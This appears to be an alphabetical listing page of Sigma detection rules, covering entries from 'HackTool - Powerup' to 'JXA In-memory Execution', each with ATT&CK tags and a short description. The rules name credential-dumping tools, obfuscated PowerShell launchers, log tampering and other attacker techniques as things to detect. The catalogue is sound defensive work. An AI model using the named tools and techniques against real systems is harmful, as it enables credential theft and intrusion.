  • HackTool - Powerup Write Hijack DLL

    Aug 12, 2024 · attack.persistence attack.privilege-escalation attack.defense-evasion attack.t1574.001

    Powerup tool's Write Hijack DLL exploits DLL hijacking for privilege escalation. In its default mode, it builds a self-deleting .bat file which executes a malicious command. The detection rule relies on the creation of the malicious bat file (debug.bat by default).

  • HackTool - PurpleSharp Execution

    Aug 12, 2024 · attack.t1587 attack.resource-development

    Detects the execution of the PurpleSharp adversary simulation tool

  • HackTool - Pypykatz Credentials Dumping Activity

    Aug 12, 2024 · attack.credential-access attack.t1003.002

    Detects the usage of "pypykatz" to obtain stored credentials. Adversaries may attempt to extract credential material from the Security Account Manager (SAM) database through the Windows registry where the SAM database is stored

  • HackTool - Quarks PwDump Execution

    Aug 12, 2024 · attack.credential-access attack.t1003.002

    Detects usage of the Quarks PwDump tool via command line arguments

  • HackTool - QuarksPwDump Dump File

    Aug 12, 2024 · attack.credential-access attack.t1003.002

    Detects a dump file written by the QuarksPwDump password dumper

  • HackTool - RedMimicry Winnti Playbook Execution

    Aug 12, 2024 · attack.execution attack.defense-evasion attack.t1106 attack.t1059.003 attack.t1218.011

    Detects actions caused by the RedMimicry Winnti playbook, an automated breach emulation utility

  • HackTool - RemoteKrbRelay Execution

    Aug 12, 2024 · attack.credential-access attack.t1558.003

    Detects the use of RemoteKrbRelay, a Kerberos relaying tool, via CommandLine flags and PE metadata.

  • HackTool - RemoteKrbRelay SMB Relay Secrets Dump Module Indicators

    Aug 12, 2024 · attack.command-and-control attack.t1219

    Detects the creation of files with specific names used by the RemoteKrbRelay SMB Relay attack module.

  • HackTool - Rubeus Execution

    Aug 12, 2024 · attack.credential-access attack.t1003 attack.t1558.003 attack.lateral-movement attack.t1550.003

    Detects the execution of the hacktool Rubeus via PE information or command line parameters

  • HackTool - Rubeus Execution - ScriptBlock

    Aug 12, 2024 · attack.credential-access attack.t1003 attack.t1558.003 attack.lateral-movement attack.t1550.003

    Detects the execution of the hacktool Rubeus using specific command line flags

  • HackTool - SafetyKatz Dump Indicator

    Aug 12, 2024 · attack.credential-access attack.t1003.001

    Detects default lsass dump filename generated by SafetyKatz.

  • HackTool - SafetyKatz Execution

    Aug 12, 2024 · attack.credential-access attack.t1003.001

    Detects the execution of the hacktool SafetyKatz via PE information and default Image name

  • HackTool - SecurityXploded Execution

    Aug 12, 2024 · attack.credential-access attack.t1555

    Detects the execution of SecurityXploded Tools

  • HackTool - SharpChisel Execution

    Aug 12, 2024 · attack.command-and-control attack.t1090.001

    Detects usage of SharpChisel via its command line arguments

  • HackTool - SharpDPAPI Execution

    Aug 12, 2024 · attack.privilege-escalation attack.defense-evasion attack.t1134.001 attack.t1134.003

    Detects the execution of the SharpDPAPI tool based on CommandLine flags and PE metadata. SharpDPAPI is a C# port of some DPAPI functionality from the Mimikatz project.

  • HackTool - SharPersist Execution

    Aug 12, 2024 · attack.persistence attack.t1053

    Detects the execution of the hacktool SharPersist, used to deploy various different kinds of persistence mechanisms

  • HackTool - SharpEvtMute Execution

    Aug 12, 2024 · attack.defense-evasion attack.t1562.002

    Detects the use of SharpEvtHook, a tool that tampers with the Windows event logs

  • HackTool - SharpImpersonation Execution

    Aug 12, 2024 · attack.privilege-escalation attack.defense-evasion attack.t1134.001 attack.t1134.003

    Detects execution of the SharpImpersonation tool, which can be used to manipulate tokens on Windows computers remotely (PsExec/WmiExec) or interactively

  • HackTool - SharpLDAPmonitor Execution

    Aug 12, 2024 · attack.discovery

    Detects execution of SharpLDAPmonitor, which can monitor the creation, deletion and changes of LDAP objects.

  • HackTool - SharpLdapWhoami Execution

    Aug 12, 2024 · attack.discovery attack.t1033 car.2016-03-001

    Detects SharpLdapWhoami, a whoami alternative that queries the LDAP service on a domain controller

  • HackTool - SharpView Execution

    Aug 12, 2024 · attack.discovery attack.t1049 attack.t1069.002 attack.t1482 attack.t1135 attack.t1033

    Adversaries may look for details about the network configuration and settings of systems they access or through information discovery of remote systems

  • HackTool - SILENTTRINITY Stager DLL Load

    Aug 12, 2024 · attack.command-and-control attack.t1071

    Detects SILENTTRINITY stager dll loading activity

  • HackTool - SILENTTRINITY Stager Execution

    Aug 12, 2024 · attack.command-and-control attack.t1071

    Detects SILENTTRINITY stager use via PE metadata

  • HackTool - Sliver C2 Implant Activity Pattern

    Aug 12, 2024 · attack.execution attack.t1059

    Detects process activity patterns as seen being used by Sliver C2 framework implants

  • HackTool - SysmonEnte Execution

    Aug 12, 2024 · attack.defense-evasion attack.t1562.002

    Detects the use of SysmonEnte, a tool to attack the integrity of Sysmon

  • HackTool - TruffleSnout Execution

    Aug 12, 2024 · attack.discovery attack.t1482

    Detects the use of TruffleSnout.exe, an iterative AD discovery toolkit for offensive operators, situational awareness and targeted low noise enumeration.

  • HackTool - Typical HiveNightmare SAM File Export

    Aug 12, 2024 · attack.credential-access attack.t1552.001 cve.2021-36934

    Detects files written by the different tools that exploit HiveNightmare

  • HackTool - WinRM Access Via Evil-WinRM

    Aug 12, 2024 · attack.lateral-movement attack.t1021.006

    Adversaries may use Valid Accounts to log into a computer using the Remote Desktop Protocol (RDP). The adversary may then perform actions as the logged-on user.

  • HackTool - Wmiexec Default Powershell Command

    Aug 12, 2024 · attack.defense-evasion attack.lateral-movement

    Detects the execution of PowerShell with a specific flag sequence that is used by the Wmiexec script

  • Hacktool Execution - PE Metadata

    Aug 12, 2024 · attack.credential-access attack.t1588.002 attack.t1003

    Detects the execution of different Windows based hacktools via PE metadata (company, product, etc.) even if the files have been renamed

  • Hacktool Ruler

    Aug 12, 2024 · attack.discovery attack.execution attack.t1087 attack.t1114 attack.t1059 attack.t1550.002

    Detects events that are generated when using the hacktool Ruler by Sensepost

  • HackTool Service Registration or Execution

    Aug 12, 2024 · attack.execution attack.t1569.002 attack.s0029

    Detects installation or execution of services

  • HAFNIUM Exchange Exploitation Activity

    Aug 12, 2024 · attack.persistence attack.t1546 attack.t1053 attack.g0125 detection.emerging-threats

    Detects activity observed by different researchers to be HAFNIUM group activity (or related) on Exchange servers

  • Hardware Model Reconnaissance Via Wmic.EXE

    Aug 12, 2024 · attack.execution attack.t1047 car.2016-03-002

    Detects the execution of WMIC with "csproduct", which is used to obtain information such as hardware models and vendor information

  • Harvesting Of Wifi Credentials Via Netsh.EXE

    Aug 12, 2024 · attack.discovery attack.credential-access attack.t1040

    Detects the harvesting of wifi credentials using netsh.exe

  • Hermetic Wiper TG Process Patterns

    Aug 12, 2024 · attack.execution attack.lateral-movement attack.t1021.001 detection.emerging-threats

    Detects process execution patterns found in intrusions related to the Hermetic Wiper malware attacks against Ukraine in February 2022

  • HH.EXE Execution

    Aug 12, 2024 · attack.defense-evasion attack.t1218.001

    Detects the execution of "hh.exe" to open ".chm" files.

  • Hidden Executable In NTFS Alternate Data Stream

    Aug 12, 2024 · attack.defense-evasion attack.s0139 attack.t1564.004

    Detects the creation of an ADS (Alternate Data Stream) that contains an executable by looking at a non-empty Imphash

  • Hidden Files and Directories

    Aug 12, 2024 · attack.defense-evasion attack.t1564.001

    Detects an adversary creating a hidden file or directory, by detecting directories or files with "." as the first character

  • Hidden Local User Creation

    Aug 12, 2024 · attack.persistence attack.t1136.001

    Detects the creation of a local hidden user account, which should not happen, for event ID 4720.

  • Hidden Powershell in Link File Pattern

    Aug 12, 2024 · attack.execution attack.t1059.001

    Detects events that appear when a user clicks on a link file with a PowerShell command in it

  • Hidden User Creation

    Aug 12, 2024 · attack.defense-evasion attack.t1564.002

    Detects creation of a hidden user account on macOS (UserID < 500) or with the IsHidden option

  • Hide Schedule Task Via Index Value Tamper

    Aug 12, 2024 · attack.defense-evasion attack.t1562

    Detects when the "index" value of a scheduled task is modified in the registry, which effectively hides it from any tooling such as "schtasks /query" (read the referenced link for more information about the effects of this technique)

  • Hiding Files with Attrib.exe

    Aug 12, 2024 · attack.defense-evasion attack.t1564.001

    Detects usage of attrib.exe to hide files from users.

  • Hijack Legit RDP Session to Move Laterally

    Aug 12, 2024 · attack.command-and-control attack.t1219

    Detects the usage of the tsclient share to place a backdoor in the RDP source machine's startup folder

  • History File Deletion

    Aug 12, 2024 · attack.impact attack.t1565.001

    Detects events in which a history file gets deleted, e.g. ~/.bash_history, to remove traces of malicious activity

  • Host Without Firewall

    Aug 12, 2024

    Host without firewall. An alert means the host is not compliant. Sigma rule for the Qualys vulnerability scanner. Scan type: Vulnerability Management.

  • HTML Help HH.EXE Suspicious Child Process

    Aug 12, 2024 · attack.defense-evasion attack.execution attack.initial-access attack.t1047 attack.t1059.001 attack.t1059.003 attack.t1059.005 attack.t1059.007 attack.t1218 attack.t1218.001 attack.t1218.010 attack.t1218.011 attack.t1566 attack.t1566.001

    Detects a suspicious child process of Microsoft HTML Help (HH.exe)

  • HTTP Request With Empty User Agent

    Aug 12, 2024 · attack.defense-evasion attack.command-and-control attack.t1071.001

    Detects potentially suspicious empty user agent strings in proxy logs. Could potentially indicate an uncommon request method.

  • Huawei BGP Authentication Failures

    Aug 12, 2024 · attack.initial-access attack.persistence attack.privilege-escalation attack.defense-evasion attack.credential-access attack.collection attack.t1078 attack.t1110 attack.t1557

    Detects BGP failures which may be indicative of brute force attacks to manipulate routing.

  • HybridConnectionManager Service Installation

    Aug 12, 2024 · attack.persistence attack.t1554

    Rule to detect the Hybrid Connection Manager service installation.

  • HybridConnectionManager Service Installation - Registry

    Aug 12, 2024 · attack.resource-development attack.t1608

    Detects the installation of the Azure Hybrid Connection Manager service to allow remote code execution from Azure function.

  • HybridConnectionManager Service Running

    Aug 12, 2024 · attack.persistence attack.t1554

    Rule to detect the Hybrid Connection Manager service running on an endpoint.

  • Hypervisor Enforced Code Integrity Disabled

    Aug 12, 2024 · attack.defense-evasion attack.t1562.001

    Detects changes to the HypervisorEnforcedCodeIntegrity registry key where the "Enabled" value is set to 0 in order to disable the Hypervisor Enforced Code Integrity feature. This allows an attacker to load unsigned and untrusted code to run in the kernel

  • Hypervisor Enforced Paging Translation Disabled

    Aug 12, 2024 · attack.defense-evasion attack.t1562.001

    Detects changes to the "DisableHypervisorEnforcedPagingTranslation" registry value where it is set to "1" in order to disable the Hypervisor Enforced Paging Translation feature.

  • IcedID Malware Suspicious Single Digit DLL Execution Via Rundll32

    Aug 12, 2024 · attack.defense-evasion attack.t1218.011 detection.emerging-threats

    Detects RunDLL32.exe executing a single digit DLL named "1.dll" with the export function "DllRegisterServer". This behaviour was often seen used by malware and especially IcedID

  • IE Change Domain Zone

    Aug 12, 2024 · attack.persistence attack.t1137

    Hides the file extension through modification of the registry

  • IE ZoneMap Setting Downgraded To MyComputer Zone For HTTP Protocols

    Aug 12, 2024 · attack.defense-evasion

    Detects changes to Internet Explorer's (IE / Windows Internet properties) ZoneMap configuration of the "HTTP" and "HTTPS" protocols to point to the "My Computer" zone. This allows files downloaded from the Internet to be granted the same level of trust as files stored locally.

  • IE ZoneMap Setting Downgraded To MyComputer Zone For HTTP Protocols Via CLI

    Aug 12, 2024 · attack.execution attack.defense-evasion

    Detects changes to Internet Explorer's (IE / Windows Internet properties) ZoneMap configuration of the "HTTP" and "HTTPS" protocols to point to the "My Computer" zone, made via the command line. This allows files downloaded from the Internet to be granted the same level of trust as files stored locally.

  • Ie4uinit Lolbin Use From Invalid Path

    Aug 12, 2024 · attack.defense-evasion attack.t1218

    Detects use of ie4uinit.exe to execute commands from a specially prepared ie4uinit.inf file from a directory other than the usual directories

  • IIS Native-Code Module Command Line Installation

    Aug 12, 2024 · attack.persistence attack.t1505.003

    Detects suspicious IIS native-code module installations via the command line

  • IIS WebServer Access Logs Deleted

    calendar Aug 12, 2024 · attack.defense-evasion attack.t1070  ·
    Share on: twitter facebook linkedin copy

    Detects the deletion of IIS WebServer access logs which may indicate an attempt to destroy forensic evidence


    Read More
  • ImagingDevices Unusual Parent/Child Processes

    Aug 12, 2024 · attack.defense-evasion attack.execution

    Detects unusual parent or children of the ImagingDevices.exe (Windows Contacts) process as seen being used with Bumblebee activity

  • Impacket PsExec Execution

    Aug 12, 2024 · attack.lateral-movement attack.t1021.002

    Detects execution of Impacket's psexec.py.

  • Import LDAP Data Interchange Format File Via Ldifde.EXE

    Aug 12, 2024 · attack.command-and-control attack.defense-evasion attack.t1218 attack.t1105

    Detects the execution of "Ldifde.exe" with the import flag "-i". This can be abused to include HTTP-based arguments which will allow the arbitrary download of files from a remote server.

  • Import PowerShell Modules From Suspicious Directories

    Aug 12, 2024 · attack.execution attack.t1059.001

    Detects powershell scripts that import modules from suspicious directories

  • Import PowerShell Modules From Suspicious Directories - ProcCreation

    Aug 12, 2024 · attack.execution attack.t1059.001

    Detects powershell scripts that import modules from suspicious directories

  • Important Scheduled Task Deleted

    Aug 12, 2024 · attack.impact attack.t1489

    Detects when adversaries try to stop system services or processes by deleting their respective scheduled tasks in order to conduct data destructive activities

  • Important Scheduled Task Deleted/Disabled

    Aug 12, 2024 · attack.execution attack.privilege-escalation attack.persistence attack.t1053.005

    Detects when adversaries stop services or processes by deleting or disabling their respective scheduled tasks in order to conduct data destructive activities

  • Important Windows Event Auditing Disabled

    Aug 12, 2024 · attack.defense-evasion attack.t1562.002

    Detects scenarios where system auditing for important events such as "Process Creation" or "Logon" events is disabled.

  • Important Windows Service Terminated Unexpectedly

    Aug 12, 2024 · attack.defense-evasion

    Detects important or interesting Windows services that were terminated unexpectedly.

  • Important Windows Service Terminated With Error

    Aug 12, 2024 · attack.defense-evasion

    Detects important or interesting Windows services that were terminated for whatever reason

  • Imports Registry Key From a File

    Aug 12, 2024 · attack.t1112 attack.defense-evasion

    Detects the import of the specified file to the registry with regedit.exe.

  • Imports Registry Key From an ADS

    Aug 12, 2024 · attack.t1112 attack.defense-evasion

    Detects the import of an alternate data stream to the registry with regedit.exe.

  • Impossible Travel

    Aug 12, 2024 · attack.t1078 attack.persistence attack.defense-evasion attack.privilege-escalation attack.initial-access

    Identifies user activities originating from geographically distant locations within a time period shorter than the time it takes to travel from the first location to the second.

  • Increased Failed Authentications Of Any Type

    Aug 12, 2024 · attack.defense-evasion attack.t1078

    Detects when sign-ins increased by 10% or greater.

  • Indicator Removal on Host - Clear Mac System Logs

    Aug 12, 2024 · attack.defense-evasion attack.t1070.002

    Detects deletion of local audit logs

  • Indirect Command Execution By Program Compatibility Wizard

    Aug 12, 2024 · attack.defense-evasion attack.t1218 attack.execution

    Detects indirect command execution via Program Compatibility Assistant pcwrun.exe

  • Indirect Command Execution From Script File Via Bash.EXE

    Aug 12, 2024 · attack.defense-evasion attack.t1202

    Detects execution of Microsoft bash launcher without any flags to execute the content of a bash script directly. This can be used to potentially bypass defenses and execute Linux or Windows-based binaries directly via bash.

  • Indirect Inline Command Execution Via Bash.EXE

    Aug 12, 2024 · attack.defense-evasion attack.t1202

    Detects execution of Microsoft bash launcher with the "-c" flag. This can be used to potentially bypass defenses and execute Linux or Windows-based binaries directly via bash.

  • InfDefaultInstall.exe .inf Execution

    Aug 12, 2024 · attack.defense-evasion attack.t1218

    Executes SCT script using scrobj.dll from a command entered into a specially prepared INF file.

  • Ingress/Egress Security Group Modification

    Aug 12, 2024 · attack.initial-access attack.t1190

    Detects when an account makes changes to the ingress or egress rules of a security group. This can indicate that an attacker is attempting to open up new attack vectors in the account, that they are trying to exfiltrate data over the network, or that they are trying to allow machines in that VPC/Subnet to contact a C&C server.

  • Insecure Proxy/DOH Transfer Via Curl.EXE

    Aug 12, 2024 · attack.execution

    Detects execution of "curl.exe" with the "insecure" flag over proxy or DOH.

  • Insecure Transfer Via Curl.EXE

    Aug 12, 2024 · attack.execution

    Detects execution of "curl.exe" with the "--insecure" flag.

  • Install New Package Via Winget Local Manifest

    Aug 12, 2024 · attack.defense-evasion attack.execution attack.t1059

    Detects usage of winget to install applications via manifest file. Adversaries can abuse winget to download payloads remotely and execute them. The manifest option enables you to install an application by passing in a YAML file directly to the client. Winget can be used to download and install exe, msi or msix files later.

  • Install Root Certificate

    Aug 12, 2024 · attack.defense-evasion attack.t1553.004

    Detects installation of new certificate on the system which attackers may use to avoid warnings when connecting to controlled web servers or C2s

  • Installation of TeamViewer Desktop

    Aug 12, 2024 · attack.command-and-control attack.t1219

    TeamViewer_Desktop.exe is created during install

  • Interactive AT Job

    Aug 12, 2024 · attack.privilege-escalation attack.t1053.002

    Detects an interactive AT job, which may be used as a form of privilege escalation.

  • Interactive Bash Suspicious Children

    Aug 12, 2024 · attack.execution attack.defense-evasion attack.t1059.004 attack.t1036

    Detects suspicious interactive bash as a parent to rather uncommon child processes

  • Internet Explorer Autorun Keys Modification

    Aug 12, 2024 · attack.persistence attack.t1547.001

    Detects modification of autostart extensibility point (ASEP) in registry.

  • Internet Explorer DisableFirstRunCustomize Enabled

    Aug 12, 2024 · attack.defense-evasion

    Detects changes to the Internet Explorer "DisableFirstRunCustomize" value, which prevents Internet Explorer from running the first run wizard the first time a user starts the browser after installing Internet Explorer or Windows.

  • Invalid PIM License

    Aug 12, 2024 · attack.t1078 attack.persistence attack.privilege-escalation

    Identifies when an organization doesn't have the proper license for PIM and is out of compliance.

  • Invocation of Active Directory Diagnostic Tool (ntdsutil.exe)

    Aug 12, 2024 · attack.credential-access attack.t1003.003

    Detects execution of ntdsutil.exe, which can be used for various attacks against the NTDS database (NTDS.DIT)

  • Invoke-Obfuscation CLIP+ Launcher

    Aug 12, 2024 · attack.defense-evasion attack.t1027 attack.execution attack.t1059.001

    Detects Obfuscated use of Clip.exe to execute PowerShell

  • Invoke-Obfuscation CLIP+ Launcher - PowerShell

    Aug 12, 2024 · attack.defense-evasion attack.t1027 attack.execution attack.t1059.001

    Detects Obfuscated use of Clip.exe to execute PowerShell

  • Invoke-Obfuscation CLIP+ Launcher - PowerShell Module

    Aug 12, 2024 · attack.defense-evasion attack.t1027 attack.execution attack.t1059.001

    Detects Obfuscated use of Clip.exe to execute PowerShell

  • Invoke-Obfuscation CLIP+ Launcher - Security

    Aug 12, 2024 · attack.defense-evasion attack.t1027 attack.execution attack.t1059.001

    Detects Obfuscated use of Clip.exe to execute PowerShell

  • Invoke-Obfuscation CLIP+ Launcher - System

    Aug 12, 2024 · attack.defense-evasion attack.t1027 attack.execution attack.t1059.001

    Detects Obfuscated use of Clip.exe to execute PowerShell

  • Invoke-Obfuscation COMPRESS OBFUSCATION

    Aug 12, 2024 · attack.defense-evasion attack.t1027 attack.execution attack.t1059.001

    Detects Obfuscated Powershell via COMPRESS OBFUSCATION

  • Invoke-Obfuscation COMPRESS OBFUSCATION - PowerShell

    Aug 12, 2024 · attack.defense-evasion attack.t1027 attack.execution attack.t1059.001

    Detects Obfuscated Powershell via COMPRESS OBFUSCATION

  • Invoke-Obfuscation COMPRESS OBFUSCATION - PowerShell Module

    Aug 12, 2024 · attack.defense-evasion attack.t1027 attack.execution attack.t1059.001

    Detects Obfuscated Powershell via COMPRESS OBFUSCATION

  • Invoke-Obfuscation COMPRESS OBFUSCATION - Security

    Aug 12, 2024 · attack.defense-evasion attack.t1027 attack.execution attack.t1059.001

    Detects Obfuscated Powershell via COMPRESS OBFUSCATION

  • Invoke-Obfuscation COMPRESS OBFUSCATION - System

    Aug 12, 2024 · attack.defense-evasion attack.t1027 attack.execution attack.t1059.001

    Detects Obfuscated Powershell via COMPRESS OBFUSCATION

  • Invoke-Obfuscation Obfuscated IEX Invocation

    Aug 12, 2024 · attack.defense-evasion attack.t1027 attack.execution attack.t1059.001

    Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the following code block

  • Invoke-Obfuscation Obfuscated IEX Invocation - PowerShell

    Aug 12, 2024 · attack.defense-evasion attack.t1027 attack.execution attack.t1059.001

    Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the following code block

  • Invoke-Obfuscation Obfuscated IEX Invocation - PowerShell Module

    Aug 12, 2024 · attack.defense-evasion attack.t1027 attack.execution attack.t1059.001

    Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the code block cited in the reference section below

  • Invoke-Obfuscation Obfuscated IEX Invocation - Security

    Aug 12, 2024 · attack.defense-evasion attack.t1027

    Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the code block linked in the references

  • Invoke-Obfuscation Obfuscated IEX Invocation - System

    Aug 12, 2024 · attack.defense-evasion attack.t1027

    Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the code block linked in the references

  • Invoke-Obfuscation RUNDLL LAUNCHER - PowerShell

    Aug 12, 2024 · attack.defense-evasion attack.t1027 attack.execution attack.t1059.001

    Detects Obfuscated Powershell via RUNDLL LAUNCHER

  • Invoke-Obfuscation RUNDLL LAUNCHER - PowerShell Module

    Aug 12, 2024 · attack.defense-evasion attack.t1027 attack.execution attack.t1059.001

    Detects Obfuscated Powershell via RUNDLL LAUNCHER

  • Invoke-Obfuscation RUNDLL LAUNCHER - Security

    Aug 12, 2024 · attack.defense-evasion attack.t1027 attack.execution attack.t1059.001

    Detects Obfuscated Powershell via RUNDLL LAUNCHER

  • Invoke-Obfuscation RUNDLL LAUNCHER - System

    Aug 12, 2024 · attack.defense-evasion attack.t1027 attack.execution attack.t1059.001

    Detects Obfuscated Powershell via RUNDLL LAUNCHER

  • Invoke-Obfuscation STDIN+ Launcher

    Aug 12, 2024 · attack.defense-evasion attack.t1027 attack.execution attack.t1059.001

    Detects Obfuscated use of stdin to execute PowerShell

  • Invoke-Obfuscation STDIN+ Launcher - Powershell

    Aug 12, 2024 · attack.defense-evasion attack.t1027 attack.execution attack.t1059.001

    Detects Obfuscated use of stdin to execute PowerShell

  • Invoke-Obfuscation STDIN+ Launcher - PowerShell Module

    Aug 12, 2024 · attack.defense-evasion attack.t1027 attack.execution attack.t1059.001

    Detects Obfuscated use of stdin to execute PowerShell

  • Invoke-Obfuscation STDIN+ Launcher - Security

    Aug 12, 2024 · attack.defense-evasion attack.t1027 attack.execution attack.t1059.001

    Detects Obfuscated use of stdin to execute PowerShell

  • Invoke-Obfuscation STDIN+ Launcher - System

    Aug 12, 2024 · attack.defense-evasion attack.t1027 attack.execution attack.t1059.001

    Detects Obfuscated use of stdin to execute PowerShell

  • Invoke-Obfuscation VAR+ Launcher

    Aug 12, 2024 · attack.defense-evasion attack.t1027 attack.execution attack.t1059.001

    Detects Obfuscated use of Environment Variables to execute PowerShell

  • Invoke-Obfuscation VAR+ Launcher - PowerShell

    Aug 12, 2024 · attack.defense-evasion attack.t1027 attack.execution attack.t1059.001

    Detects Obfuscated use of Environment Variables to execute PowerShell

  • Invoke-Obfuscation VAR+ Launcher - PowerShell Module

    Aug 12, 2024 · attack.defense-evasion attack.t1027 attack.execution attack.t1059.001

    Detects Obfuscated use of Environment Variables to execute PowerShell

  • Invoke-Obfuscation VAR+ Launcher - Security

    Aug 12, 2024 · attack.defense-evasion attack.t1027 attack.execution attack.t1059.001

    Detects Obfuscated use of Environment Variables to execute PowerShell

  • Invoke-Obfuscation VAR+ Launcher - System

    Aug 12, 2024 · attack.defense-evasion attack.t1027 attack.execution attack.t1059.001

    Detects Obfuscated use of Environment Variables to execute PowerShell

  • Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION

    Aug 12, 2024 · attack.defense-evasion attack.t1027 attack.execution attack.t1059.001

    Detects Obfuscated Powershell via VAR++ LAUNCHER

  • Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - PowerShell

    Aug 12, 2024 · attack.defense-evasion attack.t1027 attack.execution attack.t1059.001

    Detects Obfuscated Powershell via VAR++ LAUNCHER

  • Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - PowerShell Module

    Aug 12, 2024 · attack.defense-evasion attack.t1027 attack.execution attack.t1059.001

    Detects Obfuscated Powershell via VAR++ LAUNCHER

  • Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - Security

    Aug 12, 2024 · attack.defense-evasion attack.t1027 attack.execution attack.t1059.001

    Detects Obfuscated Powershell via VAR++ LAUNCHER

  • Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - System

    Aug 12, 2024 · attack.defense-evasion attack.t1027 attack.execution attack.t1059.001

    Detects Obfuscated Powershell via VAR++ LAUNCHER

  • Invoke-Obfuscation Via Stdin

    Aug 12, 2024 · attack.defense-evasion attack.t1027 attack.execution attack.t1059.001

    Detects Obfuscated Powershell via Stdin in Scripts

  • Invoke-Obfuscation Via Stdin - Powershell

    Aug 12, 2024 · attack.defense-evasion attack.t1027 attack.execution attack.t1059.001

    Detects Obfuscated Powershell via Stdin in Scripts

  • Invoke-Obfuscation Via Stdin - PowerShell Module

    Aug 12, 2024 · attack.defense-evasion attack.t1027 attack.execution attack.t1059.001

    Detects Obfuscated Powershell via Stdin in Scripts

  • Invoke-Obfuscation Via Stdin - Security

    Aug 12, 2024 · attack.defense-evasion attack.t1027 attack.execution attack.t1059.001

    Detects Obfuscated Powershell via Stdin in Scripts

  • Invoke-Obfuscation Via Stdin - System

    Aug 12, 2024 · attack.defense-evasion attack.t1027 attack.execution attack.t1059.001

    Detects Obfuscated Powershell via Stdin in Scripts

  • Invoke-Obfuscation Via Use Clip

    Aug 12, 2024 · attack.defense-evasion attack.t1027 attack.execution attack.t1059.001

    Detects Obfuscated Powershell via use Clip.exe in Scripts

  • Invoke-Obfuscation Via Use Clip - Powershell

    Aug 12, 2024 · attack.defense-evasion attack.t1027 attack.execution attack.t1059.001

    Detects Obfuscated Powershell via use Clip.exe in Scripts

  • Invoke-Obfuscation Via Use Clip - PowerShell Module

    Aug 12, 2024 · attack.defense-evasion attack.t1027 attack.execution attack.t1059.001

    Detects Obfuscated Powershell via use Clip.exe in Scripts

  • Invoke-Obfuscation Via Use Clip - Security

    Aug 12, 2024 · attack.defense-evasion attack.t1027 attack.execution attack.t1059.001

    Detects Obfuscated Powershell via use Clip.exe in Scripts

  • Invoke-Obfuscation Via Use Clip - System

    Aug 12, 2024 · attack.defense-evasion attack.t1027 attack.execution attack.t1059.001

    Detects Obfuscated Powershell via use Clip.exe in Scripts

  • Invoke-Obfuscation Via Use MSHTA

    Aug 12, 2024 · attack.defense-evasion attack.t1027 attack.execution attack.t1059.001

    Detects Obfuscated Powershell via use MSHTA in Scripts

  • Invoke-Obfuscation Via Use MSHTA - PowerShell

    Aug 12, 2024 · attack.defense-evasion attack.t1027 attack.execution attack.t1059.001

    Detects Obfuscated Powershell via use MSHTA in Scripts

  • Invoke-Obfuscation Via Use MSHTA - PowerShell Module

    Aug 12, 2024 · attack.defense-evasion attack.t1027 attack.execution attack.t1059.001

    Detects Obfuscated Powershell via use MSHTA in Scripts

  • Invoke-Obfuscation Via Use MSHTA - Security

    Aug 12, 2024 · attack.defense-evasion attack.t1027 attack.execution attack.t1059.001

    Detects Obfuscated Powershell via use MSHTA in Scripts

  • Invoke-Obfuscation Via Use MSHTA - System

    Aug 12, 2024 · attack.defense-evasion attack.t1027 attack.execution attack.t1059.001

    Detects Obfuscated Powershell via use MSHTA in Scripts

  • Invoke-Obfuscation Via Use Rundll32 - PowerShell

    Aug 12, 2024 · attack.defense-evasion attack.t1027 attack.execution attack.t1059.001

    Detects Obfuscated Powershell via use Rundll32 in Scripts

  • Invoke-Obfuscation Via Use Rundll32 - PowerShell Module

    Aug 12, 2024 · attack.defense-evasion attack.t1027 attack.execution attack.t1059.001

    Detects Obfuscated Powershell via use Rundll32 in Scripts

  • Invoke-Obfuscation Via Use Rundll32 - Security

    Aug 12, 2024 · attack.defense-evasion attack.t1027 attack.execution attack.t1059.001

    Detects Obfuscated Powershell via use Rundll32 in Scripts

  • Invoke-Obfuscation Via Use Rundll32 - System

    Aug 12, 2024 · attack.defense-evasion attack.t1027 attack.execution attack.t1059.001

    Detects Obfuscated Powershell via use Rundll32 in Scripts

  • ISO File Created Within Temp Folders

    Aug 12, 2024 · attack.initial-access attack.t1566.001

    Detects the creation of an ISO file in the Outlook temp folder or in the Appdata temp folder. Typical of Qakbot TTP from end-July 2022.

  • ISO Image Mounted

    Aug 12, 2024 · attack.initial-access attack.t1566.001

    Detects the mount of an ISO image on an endpoint

  • ISO or Image Mount Indicator in Recent Files

    Aug 12, 2024 · attack.initial-access attack.t1566.001

    Detects the creation of a recent element file that points to an .ISO, .IMG, .VHD or .VHDX file as often used in phishing attacks. This can be a false positive on server systems, but on workstations users should rarely mount .iso or .img files.

  • JAMF MDM Execution

    Aug 12, 2024 · attack.execution

    Detects execution of the "jamf" binary to create user accounts and run commands. For example, the binary can be abused by attackers on the system in order to bypass security controls or remove application control policies.

  • JAMF MDM Potential Suspicious Child Process

    Aug 12, 2024 · attack.execution

    Detects potential suspicious child processes of "jamf". Could be a sign of potential abuse of Jamf as a C2 server as seen by Typhon MythicAgent.

  • Java Payload Strings

    Aug 12, 2024 · cve.2022-26134 cve.2021-26084 attack.initial-access attack.t1190

    Detects possible Java payloads in web access logs

  • Java Running with Remote Debugging

    Aug 12, 2024 · attack.t1203 attack.execution

    Detects a Java process running with remote debugging allowing more than just localhost to connect

  • JexBoss Command Sequence

    Aug 12, 2024 · attack.execution attack.t1059.004

    Detects suspicious command sequences used by JexBoss

  • JNDIExploit Pattern

    Aug 12, 2024 · attack.initial-access attack.t1190

    Detects exploitation attempt using the JNDI-Exploit-Kit

  • JScript Compiler Execution

    Aug 12, 2024 · attack.defense-evasion attack.t1127

    Detects the execution of "jsc.exe" (JScript Compiler). Attackers might abuse this in order to compile JScript files on the fly and bypass application whitelisting.

  • Juniper BGP Missing MD5

    Aug 12, 2024 · attack.initial-access attack.persistence attack.privilege-escalation attack.defense-evasion attack.credential-access attack.collection attack.t1078 attack.t1110 attack.t1557

    Detects Juniper BGP sessions missing an MD5 digest, which may be indicative of brute force attacks to manipulate routing.

  • JXA In-memory Execution Via OSAScript

